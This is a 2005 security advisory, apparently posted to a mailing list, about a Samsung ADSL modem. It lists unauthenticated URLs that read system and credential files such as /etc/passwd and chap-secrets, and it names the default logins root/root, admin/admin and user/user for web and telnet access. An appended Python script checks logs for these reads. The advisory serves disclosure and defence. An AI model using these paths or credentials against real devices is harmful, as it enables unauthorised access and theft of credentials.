From: se_cur_ity at hotmail.com (Morning Wood)
Subject: Samsung ADSL Modem Vulnerability

------------------------------------------------------------
     - EXPL-A-2005-002 exploitlabs.com Advisory 031 -
------------------------------------------------------------
                       - Samsung ADSL Modem -






AFFECTED PRODUCTS
=================
Samsung ADSL Modem

Samsung Electronics
http://www.samsung.com


DETAILS
=======
1. Arbitrary reading of files
2. Default root password
3. root file system access


Known issues exist in Boa httpd as per:
FreeBSD-SA-00:60 Security Advisory

http://www.securiteam.com/unixfocus/6G0081P0AI.html and
http://lists.insecure.org/lists/bugtraq/2000/Oct/0445.html

note:
 This is a hardware-based product with a built-in httpd for
 remote access. This is a separate issue from the ones
 formally presented above, but it carries the same implications.


Identification:

HTTP/1.0 400 Bad Request
Date: Sat, 03 Jan 1970 17:57:18 GMT
Server: Boa/0.93.15
Connection: close
Content-Type: text/html

Modem vendor Samsung Electronics (co) modem 
co chipset vendor b500545354430002 
cpe chipset vendor Samsung Electronics (co) cpe chipset 
software version  SMDK8947v1.2 Jul 11 2003 10:00:01 
ADSL DMT version a-110.030620-10130710


Samsung ADSL modems run uClinux OS
http://www.uclinux.com

note:
Depending on the implementation, other products
using a combination of Boa / uClinux may be
affected as well.


Item 1
=====
http://[someSamsung.ip]/etc/passwd
http://[someSamsung.ip]/etc/hosts
http://[someSamsung.ip]/bin/
http://[someSamsung.ip]/dev/
http://[someSamsung.ip]/lib/
http://[someSamsung.ip]/tmp/

http://[someSamsung.ip]/var/ppp/chap-secrets

http://[someSamsung.ip]/bin/sh

Any remote user may request any file present
in the router/modem OS file system.
Files can be fetched unauthenticated via a
GET request in a browser.


Item 2
=====
Default user login / passwords exist in both
httpd ( http://[host]/cgi-bin/adsl.cgi) and telnet ports

root/root
admin/admin
user/user


Item 3
======
By telnetting to the device and logging in as
root/root, remote users may access the filesystem.
The modem provides 256mb of RAM for OS and
file system operations. In this implementation
there is approx. 120mb of free file system space,
which allows for the possibility of remote
attackers using the file system for malicious
communication and file storage. This allows
many scenarios, such as storing a worm and/or
viral code.

#echo "some bad data" >file



SOLUTION:
=========
none to date

Samsung has been contacted
No patch released



Credits
=======
This vulnerability was discovered and researched by 
Donnie Werner of exploitlabs

Donnie Werner

mail: morning_wood@...e-h.org
-- 
web: http://exploitlabs.com
web: http://zone-h.org
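
Added example (not part of the original advisory): a log check for the Item 1 exposure that flags successful GET/HEAD requests for the system directories listed there. It assumes the httpd or an upstream proxy writes Common Log Format; the function names and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from posixpath import normpath
from urllib.parse import unquote, urlsplit

# Top-level directories named in Item 1; a modem's web UI has no reason to serve them.
SYSTEM_PREFIXES = ("/etc", "/bin", "/dev", "/lib", "/tmp", "/var")

# Assumed Common Log Format: host ident user [time] "METHOD target PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')

def canonical_path(target):
    """Percent-decode and collapse redundant segments so variant spellings still match."""
    path = unquote(urlsplit(target).path)
    return normpath("/" + path.lstrip("/"))

def find_exposed_reads(lines):
    """Return {client_ip: [paths]} for successful GET/HEAD requests to system paths."""
    hits = defaultdict(list)
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        client, method, target, status = m.groups()
        if method not in ("GET", "HEAD") or not status.startswith("2"):
            continue  # only requests the server answered with content
        path = canonical_path(target)
        if any(path == p or path.startswith(p + "/") for p in SYSTEM_PREFIXES):
            hits[client].append(path)
    return dict(hits)

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [03/Jan/1970:17:57:18 +0000] "GET /etc/passwd HTTP/1.0" 200 312',
    '198.51.100.7 - - [03/Jan/1970:17:57:20 +0000] "GET /var/ppp/chap-secrets HTTP/1.0" 200 88',
    '198.51.100.7 - - [03/Jan/1970:17:57:25 +0000] "GET /bin/sh HTTP/1.0" 200 40960',
    '192.0.2.10 - - [03/Jan/1970:18:01:02 +0000] "GET /cgi-bin/adsl.cgi HTTP/1.0" 401 0',
    '192.0.2.10 - - [03/Jan/1970:18:01:09 +0000] "GET /etc/shadow HTTP/1.0" 404 0',
    '192.0.2.10 - - [03/Jan/1970:18:01:11 +0000] "GET /etcetera.html HTTP/1.0" 200 120',
]

if __name__ == "__main__":
    for client, paths in find_exposed_reads(SAMPLE_LOG).items():
        print(client, "read", ", ".join(paths))
```

Any client this reports has received a system file from the device, so credentials stored in those files should be treated as disclosed.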
 
